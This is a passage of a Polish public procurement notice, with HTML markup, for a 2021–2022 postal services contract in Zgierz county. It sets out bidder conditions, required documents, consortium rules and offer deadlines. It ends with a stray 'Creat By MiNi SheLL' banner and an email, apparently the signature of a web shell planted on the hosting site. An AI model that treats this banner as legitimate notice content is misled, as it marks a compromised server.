Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a) posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/><br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada uprawnienia do wykonywania działalności pocztowej na obszarze Rzeczpospolitej Polskiej oraz za granicą, potwierdzone wpisem do rejestru operatorów pocztowych, prowadzonym przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z ustawą z dnia 23.11.2012 r. Prawo pocztowe (t.j. Dz. U. z 2020 r. poz. 1041 późn.zm.) w zakresie obrotu krajowego i zagranicznego.<br/>b) zdolności technicznej lub zawodowej:<br/><br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca zapewnia możliwość nadawania i odbioru wszystkich przesyłek objętych przedmiotem niniejszego zamówienia w placówkach nadawczych będących w dyspozycji Wykonawcy, usytuowanych w miejscowościach objętych właściwością miejscową Zamawiającego, w których Zamawiający posiada siedzibę główną i oddziały terenowe tj. w obszarze powiatu zgierskiego w miejscowościach:<br/>1) Zgierz, ul Barona 10, siedziba główna,<br/>2)	Aleksandrów Łódzki – Punkt Informacyjno-Konsultacyjny <br/>ul. Piotrkowska 4/6,<br/>3)	Głowno, Punkt Informacyjno-Konsultacyjny, ul. Norblina 1,<br/>4)	Ozorków, Punkt Informacyjno-Konsultacyjny ul. Kościelna 1,<br/> czynnych od poniedziałku do piątku co najmniej przez 3 godziny dziennie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została oceniona najwyżej, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowego środka dowodowego, aktualnego na dzień jego złożenia w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, tj.<br/>1) wpisu do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z ustawą z dnia 23.11.2012 r. Prawo pocztowe (t.j. Dz. U. z 2020 r. poz. 1041 z późn.zm.) w zakresie obrotu krajowego zagranicznego, chyba że Zamawiający może uzyskać aktualne dane za pomocą bezpłatnych i ogólnodostępnych baz danych. W takim przypadku Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów.<br/>2) wykazu placówek wskazanych przez Wykonawcę do nadawania i odbioru przesyłek objętych niniejszym zamówieniem i oświadczenia Wykonawcy, stwierdzającego, że dysponuje punktami odbioru niedoręczonych przesyłek, w tym awizowanych, na terenie każdej gminy lub gminy sąsiedniej na terenie Rzeczypospolitej Polskiej, stanowiącego załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć:<br/>1)	formularz ofertowy zgodnie z Załącznikiem nr 2 do SWZ oraz, jeżeli dotyczy, zobowiązania podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia<br/>2) oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 4 do SWZ<br/>3)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>4) Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z informacji z KRS lub CEiIDG, zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. <br/> Dotyczy to odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach. <br/><br/> Pełnomocnictwo powinno posiadać taką samą formę jak oferta (pod rygorem nieważności składa się je w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców, w zakresie, w jakim wykazuje spełnienie warunków udziału w postępowaniu.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek, o którym mowa w cz. VIII ust. 3 lit. a powinien spełnić ten wykonawca, który będzie realizował usługi wymagające wpisu do Rejestru Operatorów Pocztowych albo wszyscy wykonawcy wspólnie.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek, o którym mowa w cz. VIII ust. 3 lit. b wykonawcy wspólnie ubiegający się o zamówienie mogą spełniać wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4.	Ceny jednostkowe podane przez Wykonawcę w Formularzu cenowym stanowiącym załącznik nr 3 do SWZ, w kwotach brutto nie będą ulegały zmianom przez cały okres obowiązywania umowy z zastrzeżeniem wprowadzenia ustawowej zmiany obowiązku podatkowego Wykonawcy w zakresie podatku od towarów i usług VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Umowa zostaje zawarta na czas określony tj. od 01 stycznia 2022 r. do 31 grudnia 2022 r.<br/>Umowa automatycznie wygasa, bez konieczności składania jakichkolwiek oświadczeń przez którąkolwiek ze Stron w przypadku wykonania przez Wykonawcę usług do kwoty maksymalnej brutto określonej w umowie

Creat By MiNi SheLL
Email: jattceo@gmail.com